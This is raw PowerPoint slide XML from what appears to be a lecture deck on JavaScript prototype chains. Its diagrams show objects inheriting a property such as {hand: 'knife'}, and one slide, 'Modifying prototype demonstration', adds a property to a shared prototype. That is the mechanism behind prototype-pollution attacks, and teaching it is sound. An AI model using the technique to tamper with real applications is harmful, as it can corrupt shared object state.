                <a:ext cx="1979305"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firebird</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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Picture 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770B0852-9FCD-C13A-E79B-5B57F1689059}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1100429" y="2852828"/>
                <a:ext cx="823156" cy="707399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17EDD60-8BA7-1D58-A2F5-41F85CC3A403}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1195909" y="3860749"/>
              <a:ext cx="1241868" cy="993967"/>
              <a:chOff x="1195909" y="3860749"/>
              <a:chExt cx="1241868" cy="993967"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAFEB31-5395-831A-9DE5-D494D06F73DC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1195909" y="454693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pic>
            <p:nvPicPr>
              <p:cNvPr id="56" name="Picture 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB445E2-FB2F-8153-2504-85E5F664D0FA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1443061" y="3860749"/>
                <a:ext cx="747563" cy="642436"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="Group 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7090343C-8652-1E9A-C184-E46CEAF2217F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3351548" y="3558063"/>
              <a:ext cx="1744412" cy="1005492"/>
              <a:chOff x="3351548" y="3558063"/>
              <a:chExt cx="1744412" cy="1005492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="TextBox 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7217477-804F-A484-7A70-3F43A596DEB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3351548" y="4255778"/>
                <a:ext cx="1744412"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59" name="Picture 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9131F03F-DC17-4C4B-7004-3C6F1A362EDD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3774858" y="3558063"/>
                <a:ext cx="834449" cy="717104"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32478684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 prototype 2.3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Group 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A3F3900-263B-DABE-82C7-E6232C15F050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="597330" y="1575749"/>
            <a:ext cx="8059243" cy="3278967"/>
            <a:chOff x="597330" y="1575749"/>
            <a:chExt cx="8059243" cy="3278967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Connector: Curved 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB31D0BF-5023-8E4D-95DC-4318ACD43594}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3743878" y="2141960"/>
              <a:ext cx="1734965" cy="8574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6A97910-B0D3-8324-4F62-44703852189A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437777" y="2670737"/>
              <a:ext cx="3041066" cy="3287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1EF57D46-5D3F-6333-F2B4-779A1BA5338C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2576635" y="2999457"/>
              <a:ext cx="2902208" cy="76327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48A24C60-C14B-9C18-B35F-DAEFF73129C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="10" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2437777" y="4409667"/>
              <a:ext cx="913771" cy="29116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73DB6A8-B84C-A941-7816-66B67F202273}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5095960" y="2999457"/>
              <a:ext cx="382883" cy="141021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DD595C3D-2DDE-0115-491D-8E4A38C694D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="3"/>
              <a:endCxn id="12" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7405884" y="2854617"/>
              <a:ext cx="602045" cy="14484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4C985A8D-88BD-6C35-5573-3AEF3A5B0F6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5478843" y="1575749"/>
              <a:ext cx="1927041" cy="1685318"/>
              <a:chOff x="5478843" y="1575749"/>
              <a:chExt cx="1927041" cy="1685318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="TextBox 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3733AF-D4CD-7237-2709-B340E20BFDF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5478843" y="2737847"/>
                <a:ext cx="1927041"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="Picture 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33239DE-DC6E-50BD-BD6D-869A2C0F872D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5812611" y="1575749"/>
                <a:ext cx="1219200" cy="1219200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF525AE5-8EDE-870B-E3D6-BFF44C203F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7914720" y="1995994"/>
              <a:ext cx="741853" cy="1012511"/>
              <a:chOff x="7914720" y="1995994"/>
              <a:chExt cx="741853" cy="1012511"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="TextBox 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FE83C1-5E40-1369-2E84-2048BCC19B96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8007929" y="2700728"/>
                <a:ext cx="64864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null</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Picture 34" descr="A yellow cat with black eyes and mouth and nose&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B906F5DB-0647-97E8-55FF-193A716462C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7914720" y="1995994"/>
                <a:ext cx="741853" cy="741853"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F1C907-7DF9-C8E9-C978-72C9700C7034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2699636" y="1815370"/>
              <a:ext cx="1044242" cy="602607"/>
              <a:chOff x="2699636" y="1815370"/>
              <a:chExt cx="1044242" cy="602607"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39BA388F-1F77-8FB4-8043-4411CDD634C2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3300535" y="1988071"/>
                <a:ext cx="443343"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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Picture 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C807E8E8-C27E-6312-0EDA-02B538358DF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2699636" y="1815370"/>
                <a:ext cx="602607" cy="602607"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="42" name="Group 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F6C6D8-C66B-2A6A-9646-71D20AC2F057}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="693365" y="1974798"/>
              <a:ext cx="1744412" cy="849827"/>
              <a:chOff x="693365" y="1974798"/>
              <a:chExt cx="1744412" cy="849827"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2E8E66-E96D-0A5F-7888-834BD5336B9C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="693365" y="2516848"/>
                <a:ext cx="1744412"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC614B07-4A49-598D-FE54-933C89D8DFD0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1315042" y="1974798"/>
                <a:ext cx="501054" cy="501054"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="Group 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BC40AE-20E0-00F9-565D-0191D0891D0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="597330" y="2852828"/>
              <a:ext cx="1979305" cy="1063787"/>
              <a:chOff x="597330" y="2852828"/>
              <a:chExt cx="1979305" cy="1063787"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE019060-9BD3-9660-58EB-C45392BF2ACF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="597330" y="3608838"/>
                <a:ext cx="1979305" cy="307777"/>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firebird</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uwu</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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Picture 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770B0852-9FCD-C13A-E79B-5B57F1689059}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1158307" y="2852828"/>
                <a:ext cx="707399" cy="707399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17EDD60-8BA7-1D58-A2F5-41F85CC3A403}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1195909" y="3860749"/>
              <a:ext cx="1241868" cy="993967"/>
              <a:chOff x="1195909" y="3860749"/>
              <a:chExt cx="1241868" cy="993967"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAFEB31-5395-831A-9DE5-D494D06F73DC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1195909" y="454693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pic>
            <p:nvPicPr>
              <p:cNvPr id="56" name="Picture 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB445E2-FB2F-8153-2504-85E5F664D0FA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1495624" y="3860749"/>
                <a:ext cx="642436" cy="642436"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="Group 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7090343C-8652-1E9A-C184-E46CEAF2217F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3351548" y="3558063"/>
              <a:ext cx="1744412" cy="1005492"/>
              <a:chOff x="3351548" y="3558063"/>
              <a:chExt cx="1744412" cy="1005492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="TextBox 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7217477-804F-A484-7A70-3F43A596DEB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3351548" y="4255778"/>
                <a:ext cx="1744412"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pic>
            <p:nvPicPr>
              <p:cNvPr id="59" name="Picture 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9131F03F-DC17-4C4B-7004-3C6F1A362EDD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3833530" y="3558063"/>
                <a:ext cx="717104" cy="717104"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="480159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E02D4-C47A-449A-B17F-A30779790810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Modifying prototype demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B1B430-04F4-2E42-F18D-EE6606F48E0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10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D892F7-9420-3BF0-8879-66ED1F15B3E9}"/>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a = {}</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b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</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Date</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b.hand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.prototype.hand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b.hand</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endParaRPr lang="zh-HK" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79ECDE8D-D2E3-9926-9E09-5597D0C9A24B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3608479" y="1836812"/>
            <a:ext cx="1927041" cy="1685318"/>
            <a:chOff x="1768719" y="2913342"/>
            <a:chExt cx="1927041" cy="1685318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E851B26-0C3D-EE61-AE55-B75A008213D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1768719" y="4075440"/>
              <a:ext cx="1927041" cy="523220"/>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{hand: "knife"}</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12644F14-0302-1585-CE1C-0431856573C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
